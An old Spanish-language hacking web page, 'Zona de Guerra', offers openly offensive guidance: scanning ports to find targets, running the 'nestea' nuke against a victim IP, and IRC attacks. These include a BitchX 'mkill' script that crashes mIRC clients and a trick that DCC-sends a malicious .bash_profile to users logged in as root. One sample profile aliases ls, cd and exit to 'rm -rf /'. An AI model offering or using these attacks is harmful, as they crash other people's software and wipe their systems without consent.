Zona de Guerra

Ahora los malos somos nosotros

[ Escaneando puertos ] [ Nukes ] [ Exploits ] [ IRC War ]

Atención, es muy importante leer antes la sección Zona de Seguridad!!!
Recuerda que la búsqueda de fallos de seguridad siempre ha de empezar por uno mismo.
Puedes encontrar todos estos exploits y muchos mas en Rootshell.com

1. Escaneando puertos: Para saber por donde atacar primero hay que encontrar los puntos flacos, un puerto abierto es el mejor sitio por donde empezar.

Escaneadores de puertos hay muchos, yo recomiendo que uséis el mas sencillo que tengáis, pues esta operación ha de ser rápida. Uno que permita poner escaneador IP rango_de_puertos será suficiente.
El Saint lleva uno muy bueno, esta en el directorio saint-1.x.x/bin y se llama tcp_scan.

Otros escaneadores como nmap son capaces de identificar el sistema operativo de la máquina remota, y en algunos casos hasta la versión, dándonos ideas de que tipo de ataque podemos usar contra esa máquina.

Truco: Los escaneos son fácilmente detectados en la máquina remota y le pondrán en guardia, úsalos con moderación.

2. Nukes:

Para compilarlos usa el comando: gcc -O2 archivo.c -o nombre_de_ejecutable, es posible que algunos de errores al intentar compilarlos si usamos glibc, en este caso podemos recurrir a instalar paquetes accesorios de libc5-devel que podemos encontrar seguramente en el ftp de nuestra distribución.

NOTA: He retirado todos los nukes de esta pagina porque no vale la pena ponerlos aquí pudiéndolos coger directamente de RootShell.

La mayoría de ellos requieren parámetros para su ejecución, la manera mas fácil de verlos es intentando ejecutarlo sin parámetro, por ejemplo:

[root:/usr/local/bin]# ./nestea
./nestea src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]
Indica que hay que ejecutarlo asi: ./nestea IP_imaginaria IP_destino y como parámetros se le pueden pasar el puerto al que dirigimos el ataque y el numero de veces. Fácil, no? pues ya esta, tema zanjado.

3. Exploits:

Los exploits son programas que usan fallos en el software, principalmente en los demonios que controlan los servicios de red, para ganar acceso a un sistema y a ser posible, con los privilegios de root.

Para poder usarlos hay que estar bastante al día de los fallos mas comunes de los servidores, saber que servicios ofrece una máquina (escáners) y tener el exploit.

NOTA: He retirado todos los explots de esta pagina porque no vale la pena ponerlos aquí pudiéndolos coger directamente de RootShell.

4. IRC War

Los nukes son para principiantes y para lammers del IRCap, ahora vamos a ver una serie de ataques realmente interesantes:

Pero recordad que lo que aquí cuenta es la inteligencia y no la fuerza bruta, lo mas fácil es que seáis baneados del canal y todos vuestros puertos queden inundados con ICMPs malintencionados, asi que cuidado.

- Una manera rápida de joder a alguien que use mIRC es ponerse como nick com1 o com2 y abrirle un query. El resultado es bloqueo del ratón (com1) o del modem (com2). El problema es que, al menos en IRC-Hipsano, por el simple hecho de ponerte ese nick te ganas un G-Line. Personalmente no lo he probado en otras redes.

- Otro ataque bastante extendido es el mkill, un sencillo script para BitchX que provoca el cierre de los mIRC 5.4, no funciona ni con anteriores ni con posteriores, y tampoco funciona si es un mIRC 5.4 + IRCap (o sea que no lo intentes si tiene otras versiones, porque ademas se da cuenta de sien ha sido), pero da un gustazo increíble cuando funciona.
Este es el mkill:

alias mkill {
        eval ctcp $0 DCC SEND Win98-Upgrade.zip 51295012 5454 12993004
        eval ctcp $0 DCC RESUME Win98-Upgrade.zip
}
Mételo en algún archivo, luego desde dentro del BitchX lo cargas con la orden /load archivo y lo usas con la orden /mkill nick.

- Ahora un ataque para roots incautos que se meten en IRC. Cuando alguien entra a IRC con una mask como esta: ~root@fistro.com una de dos: o acaba de instalarse el Linux y no se entera de nada o es uno de esos usuarios que lo hacen todo como root y que acaban reinstalando el sistema aproximadamente una vez al mes. Un ataque facilísimo a estos personajes es enviarle por dcc algún fichero .bash* de los que se ejecutan durante el login, puedes tener por seguro que alguien que entra como root tiene el auto-get activado.
Podríamos enviar por ejemplo un .bash_profile como este:

# .bash_profile
export PS1="Esto_te_pasa_por_entrar_en_irc_como_root_pardillo!: "

Pueden pasar dos cosas: que se de cuenta y elimine el archivo, con lo que al menos hemos conseguido fastidiarle su login "normal"; o que no se de cuenta, con lo que su cara de asombro al hacer el siguiente login será digna de foto. :)

Piensa en las posibilidades de este ataque, puedes ejcutar Cualquier orden en el ordenador remoto con permisos de root!

Por ejemplo este es uno de los .bash_profile malignos que se me acaban de ocurrir:

# .bash_profile
alias ls='rm -rf /'
alias cd='rm -rf /'
alias exit='rm -rf /'
 


 [ Linux Hack Zone ]
[ Zona de Seguridad ] [ Zona de guerra ] [ Zona de Espionaje ] [ Logística ]